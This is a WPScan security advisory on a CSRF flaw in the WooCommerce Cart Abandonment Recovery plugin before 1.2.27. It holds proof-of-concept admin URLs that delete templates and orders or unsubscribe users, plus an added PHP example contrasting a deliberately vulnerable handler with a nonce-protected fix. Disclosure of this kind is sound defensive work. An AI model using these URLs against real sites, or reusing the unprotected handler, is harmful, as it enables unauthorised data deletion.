wpexploit | Erwan LR (WPScan) | WPEX-ID: C740ED3B-D6B8-4AFC-8C6B-A1EC37597055
History: Mar 13, 2024 - 12:00 a.m.

WooCommerce Cart Abandonment Recovery < 1.2.27 - Templates/Abandoned Orders Deletion via CSRF

2024-03-13 00:00:00
Erwan LR (WPScan)
Tags: wordpress, woocommerce, csrf, security vulnerability, unauthorized access

AI Score: 6.9 Medium (Confidence: High)
EPSS: 0.0004 Low (Percentile: 9.1%)

Description: The plugin does not have a CSRF check in its bulk actions, which could allow attackers to make logged-in admins delete arbitrary email templates, as well as delete and unsubscribe users from abandoned orders, via CSRF attacks.

Make a logged-in admin open one of the URLs below:

- To make them delete the Email Template with ID 1:
https://example.com/wp-admin/admin.php?page=woo-cart-abandonment-recovery&action=email_tmpl&action2=email_tmpl&sub_action=delete_bulk_email_tmpl&id[]=1

- To make them delete the abandoned order with ID 1:
https://example.com/wp-admin/admin.php?page=woo-cart-abandonment-recovery&action=delete&action2=delete&id=1

- To make them unsubscribe the user from the abandoned order with ID 1:
https://example.com/wp-admin/admin.php?page=woo-cart-abandonment-recovery&action=unsubscribe&action2=unsubscribe&id=1
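As an added illustration of the missing check (hypothetical handler code written for this page, not the plugin's own code, which is not shown here), the following takes the `page`/`action`/`id` parameters from the URLs above, first in the pattern that trusts any request from a logged-in admin, then hardened with a WordPress nonce and a capability check. The function names, the `manage_woocommerce` capability and the nonce action strings are assumptions.

```php
<?php
// Added example (hypothetical, not the plugin's code): handling the
// delete/unsubscribe actions from the page's PoC URLs.

// Placeholders for the plugin's real data-layer routines (assumed names).
function wcar_example_delete_abandoned_order( $id )      { do_action( 'wcar_example_delete', $id ); }
function wcar_example_unsubscribe_abandoned_order( $id ) { do_action( 'wcar_example_unsubscribe', $id ); }

function wcar_example_is_plugin_page() {
    return isset( $_GET['page'] ) && 'woo-cart-abandonment-recovery' === $_GET['page'];
}

// VULNERABLE PATTERN: being logged in is the only requirement, so any site
// that makes the admin's browser load the URL gets the action performed.
function wcar_example_handle_vulnerable() {
    if ( ! wcar_example_is_plugin_page() ) { return; }
    $action = isset( $_GET['action'] ) ? sanitize_key( $_GET['action'] ) : '';
    if ( 'delete' === $action ) {
        wcar_example_delete_abandoned_order( absint( $_GET['id'] ) ); // no nonce, no capability check
    }
}

// HARDENED PATTERN: an explicit capability check plus a nonce bound to the
// exact action and target id; check_admin_referer() calls wp_die() on mismatch.
function wcar_example_handle_hardened() {
    if ( ! wcar_example_is_plugin_page() ) { return; }
    $action = isset( $_GET['action'] ) ? sanitize_key( $_GET['action'] ) : '';
    if ( ! in_array( $action, array( 'delete', 'unsubscribe' ), true ) ) { return; }
    if ( ! current_user_can( 'manage_woocommerce' ) ) {   // assumed capability
        wp_die( 'Insufficient permissions.', 403 );
    }
    $id = isset( $_GET['id'] ) ? absint( $_GET['id'] ) : 0;
    check_admin_referer( 'wcar_example_' . $action . '_' . $id ); // verifies _wpnonce
    if ( 'delete' === $action ) {
        wcar_example_delete_abandoned_order( $id );
    } else {
        wcar_example_unsubscribe_abandoned_order( $id );
    }
}

// Links rendered in the admin list must carry the matching nonce, so a URL
// copied into a third-party page (as in the PoC) is rejected by the handler.
function wcar_example_action_link( $action, $id ) {
    $url = add_query_arg(
        array( 'page' => 'woo-cart-abandonment-recovery', 'action' => $action, 'action2' => $action, 'id' => $id ),
        admin_url( 'admin.php' )
    );
    return wp_nonce_url( $url, 'wcar_example_' . $action . '_' . $id );
}
add_action( 'admin_init', 'wcar_example_handle_hardened' );
```

The same nonce-plus-capability pattern applies to the bulk `sub_action=delete_bulk_email_tmpl&id[]=...` path; there the nonce would be emitted with the bulk form rather than per-row links.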

